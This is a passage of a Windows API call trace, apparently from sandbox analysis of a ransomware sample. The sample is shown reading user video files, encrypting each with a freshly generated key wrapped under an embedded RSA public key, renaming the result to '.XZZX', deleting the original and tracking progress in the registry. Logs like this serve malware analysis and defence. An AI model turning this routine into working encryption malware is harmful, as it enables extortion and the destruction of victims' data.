lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x30, lpOverlapped=0x0) returned 1 [0128.628] SetFilePointer (in: hFile=0x638, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xba34 [0128.628] WriteFile (in: hFile=0x638, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0128.628] SetFilePointer (in: hFile=0x638, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xba39 [0128.628] SetErrorMode (uMode=0x1) returned 0x1 [0128.628] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0128.628] OutputDebugStringW (lpOutputString="end") [0128.628] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----và\x83Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0128.628] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0128.628] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3d1f090) returned 1 [0128.629] CryptImportPublicKeyInfo (in: hCryptProv=0x3d1f090, dwCertEncodingType=0x1, pInfo=0x3d0e318*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0e348*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0e350*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3cde458) returned 1 [0128.629] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0128.630] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0128.630] CryptEncrypt (in: hKey=0x3cde458, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0128.630] CryptEncrypt (in: hKey=0x3cde458, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3d1f118*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3d1f118*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0128.630] WriteFile (in: hFile=0x638, lpBuffer=0x3d1f118*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3d1f118*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0128.630] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0128.630] WriteFile (in: hFile=0x638, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0128.630] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0128.631] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0128.631] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x65c) returned 0x0 [0128.631] RegQueryValueExW (in: hKey=0x65c, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0xa6, lpcbData=0x420dfdc*=0x4) returned 0x0 [0128.631] RegCloseKey (hKey=0x65c) returned 0x0 [0128.631] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x65c) returned 0x0 [0128.631] RegSetValueExW (in: hKey=0x65c, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0xa7, cbData=0x4 | out: lpData=0x420dfec*=0xa7) returned 0x0 [0128.631] RegCloseKey (hKey=0x65c) returned 0x0 [0128.631] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0128.631] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0128.632] CloseHandle (hObject=0x638) returned 1 [0128.633] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0128.634] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0128.634] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\D30YP5u1qzg5-VZ7306q.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\d30yp5u1qzg5-vz7306q.mkv")) returned 1 [0128.635] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\D30YP5u1qzg5-VZ7306q.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\d30yp5u1qzg5-vz7306q.mkv")) returned 0 Thread: id = 431 os_tid = 0x9cc [0128.637] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0128.637] lstrcpyW (in: lpString1=0x420f460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0128.637] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0128.638] SetErrorMode (uMode=0x1) returned 0x1 [0128.638] lstrcpyW (in: lpString1=0x420f860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0128.638] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x766745d4, Data2=0x4f86, Data3=0x475d, Data4=([0]=0x97, [1]=0x4c, [2]=0x4d, [3]=0x8f, [4]=0x1f, [5]=0xa4, [6]=0x71, [7]=0x2d))) returned 0x0 [0128.638] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned 52 [0128.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0128.638] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\D89AF8F8162B0DAE766745D41A4BF1F6.XZZX") returned 78 [0128.638] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0128.638] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini", dwFileAttributes=0x20) returned 1 [0128.638] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x658 [0128.639] ReadFile (in: hFile=0x658, lpBuffer=0x3d17d70, nNumberOfBytesToRead=0x1f8, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3d17d70*, lpNumberOfBytesRead=0x420e418*=0x1f8, lpOverlapped=0x0) returned 1 [0128.639] CloseHandle (hObject=0x658) returned 1 [0128.639] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0128.640] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0128.640] SetErrorMode (uMode=0x1) returned 0x1 [0128.640] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0128.640] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3d1f1a0) returned 1 [0128.643] CryptGenKey (in: hProv=0x3d1f1a0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cde298) returned 1 [0128.829] CryptExportKey (in: hKey=0x3cde298, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0128.829] CryptExportKey (in: hKey=0x3cde298, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0128.829] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0128.829] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0128.829] CryptDestroyKey (hKey=0x3cde298) returned 1 [0128.829] CryptReleaseContext (hProv=0x3d1f1a0, dwFlags=0x0) returned 1 [0128.830] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\D89AF8F8162B0DAE766745D41A4BF1F6.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\d89af8f8162b0dae766745d41a4bf1f6.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x660 [0128.830] WriteFile (in: hFile=0x660, lpBuffer=0x3d17d70*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3d17d70*, lpNumberOfBytesWritten=0x420e438*=0x1f8, lpOverlapped=0x0) returned 1 [0128.830] SetFilePointer (in: hFile=0x660, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1f8 [0128.831] WriteFile (in: hFile=0x660, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0128.831] SetFilePointer (in: hFile=0x660, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1fd [0128.831] WriteFile (in: hFile=0x660, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x16, lpOverlapped=0x0) returned 1 [0128.831] SetFilePointer (in: hFile=0x660, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x213 [0128.831] WriteFile (in: hFile=0x660, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0128.831] SetFilePointer (in: hFile=0x660, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x218 [0128.831] SetErrorMode (uMode=0x1) returned 0x1 [0128.831] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0128.831] OutputDebugStringW (lpOutputString="end") [0128.831] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----và\x83Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0128.831] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0128.831] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3d1f1a0) returned 1 [0128.832] CryptImportPublicKeyInfo (in: hCryptProv=0x3d1f1a0, dwCertEncodingType=0x1, pInfo=0x3d0e3e8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0e418*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0e420*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3cde498) returned 1 [0128.832] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0128.832] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0128.832] CryptEncrypt (in: hKey=0x3cde498, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0128.832] CryptEncrypt (in: hKey=0x3cde498, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3d1f228*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3d1f228*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0128.832] WriteFile (in: hFile=0x660, lpBuffer=0x3d1f228*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3d1f228*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0128.832] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0128.832] WriteFile (in: hFile=0x660, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0128.832] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0128.833] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0128.833] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x664) returned 0x0 [0128.833] RegQueryValueExW (in: hKey=0x664, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0xa7, lpcbData=0x420dfdc*=0x4) returned 0x0 [0128.833] RegCloseKey (hKey=0x664) returned 0x0 [0128.833] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x664) returned 0x0 [0128.833] RegSetValueExW (in: hKey=0x664, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0xa8, cbData=0x4 | out: lpData=0x420dfec*=0xa8) returned 0x0 [0128.833] RegCloseKey (hKey=0x664) returned 0x0 [0128.833] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0128.833] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0128.834] CloseHandle (hObject=0x660) returned 1 [0128.835] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0128.836] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0128.836] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini")) returned 1 [0128.837] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini")) returned 0 Thread: id = 432 os_tid = 0x9d4 [0128.838] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0128.838] lstrcpyW (in: lpString1=0x434f460, lpString2="J20J9-k9Q1AQR.swf" | out: lpString1="J20J9-k9Q1AQR.swf") returned="J20J9-k9Q1AQR.swf" [0128.838] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0128.838] SetErrorMode (uMode=0x1) returned 0x1 [0128.839] lstrcpyW (in: lpString1=0x434f860, lpString2="J20J9-k9Q1AQR.swf" | out: lpString1="J20J9-k9Q1AQR.swf") returned="J20J9-k9Q1AQR.swf" [0128.839] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0x163ced04, Data2=0xd1af, Data3=0x451a, Data4=([0]=0x9d, [1]=0x4c, [2]=0xe9, [3]=0x90, [4]=0x60, [5]=0xe7, [6]=0xa, [7]=0x6))) returned 0x0 [0128.839] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\J20J9-k9Q1AQR.swf") returned 58 [0128.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0128.839] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\F12649BC389976C6163CED043CCE5B0E.XZZX") returned 78 [0128.839] StrStrW (lpFirst="J20J9-k9Q1AQR.swf", lpSrch="XZZX") returned 0x0 [0128.839] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\J20J9-k9Q1AQR.swf", dwFileAttributes=0x20) returned 1 [0128.839] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\J20J9-k9Q1AQR.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\j20j9-k9q1aqr.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x638 [0128.840] ReadFile (in: hFile=0x638, lpBuffer=0x3cf1358, nNumberOfBytesToRead=0x178c5, lpNumberOfBytesRead=0x434e418, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesRead=0x434e418*=0x178c5, lpOverlapped=0x0) returned 1 [0128.841] CloseHandle (hObject=0x638) returned 1 [0128.841] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0128.841] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0128.842] SetErrorMode (uMode=0x1) returned 0x1 [0128.842] lstrcpyW (in: lpString1=0x434e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0128.842] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3d1f2b0) returned 1 [0128.844] CryptGenKey (in: hProv=0x3d1f2b0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cde298) returned 1 [0129.002] CryptExportKey (in: hKey=0x3cde298, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x434e41c | out: pbData=0x0*, pdwDataLen=0x434e41c*=0x94) returned 1 [0129.002] CryptExportKey (in: hKey=0x3cde298, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x434e41c | out: pbData=0x40a0000*, pdwDataLen=0x434e41c*=0x94) returned 1 [0129.002] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0129.003] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0129.003] CryptDestroyKey (hKey=0x3cde298) returned 1 [0129.003] CryptReleaseContext (hProv=0x3d1f2b0, dwFlags=0x0) returned 1 [0129.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\F12649BC389976C6163CED043CCE5B0E.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\f12649bc389976c6163ced043cce5b0e.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0129.003] WriteFile (in: hFile=0x664, lpBuffer=0x3cf1358*, nNumberOfBytesToWrite=0x178c5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesWritten=0x434e438*=0x178c5, lpOverlapped=0x0) returned 1 [0129.005] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x178c5 [0129.005] WriteFile (in: hFile=0x664, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0129.005] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x178ca [0129.005] WriteFile (in: hFile=0x664, lpBuffer=0x434f860*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x434f860*, lpNumberOfBytesWritten=0x434e438*=0x22, lpOverlapped=0x0) returned 1 [0129.005] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, 